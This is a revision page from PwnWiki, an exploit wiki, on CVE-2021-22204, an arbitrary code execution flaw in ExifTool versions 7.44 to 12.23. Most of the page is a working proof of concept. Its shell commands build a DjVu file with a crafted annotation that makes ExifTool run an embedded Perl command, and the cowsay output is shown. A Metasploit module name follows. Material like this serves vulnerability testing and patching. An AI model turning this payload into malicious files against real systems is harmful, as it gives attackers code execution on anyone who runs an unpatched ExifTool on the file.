Difference between revisions of "CVE-2021-22204 ExifTool任意代碼執行漏洞"

From PwnWiki
(Created page with "==影響版本== ExifTool 7.44 to 12.23 ==POC== <pre> $ printf 'P1 1 1 0' > moo.pbm $ cjb2 moo.pbm moo.djvu $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"...")
 
Line 1: Line 1:
 +
<languages. />
 +
 +
<translate>
 
==影響版本==
 
==影響版本==
 +
</translate>
 
ExifTool 7.44 to 12.23
 
ExifTool 7.44 to 12.23
  

Revision as of 20:07, 11 May 2021

<languages. />

影響版本

ExifTool 7.44 to 12.23


POC

  $ printf 'P1 1 1 0' > moo.pbm
   $ cjb2 moo.pbm moo.djvu
   $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
   $ exiftool moo.djvu > /dev/null
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

-- 
Jakub Wilk

Metasploit

https://github.com/rapid7/metasploit-framework/pull/15185 

exploit/unix/fileformat/exiftool_djvu_ant_perl_injection
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-22204_ExifTool任意代碼執行漏洞&oldid=2763"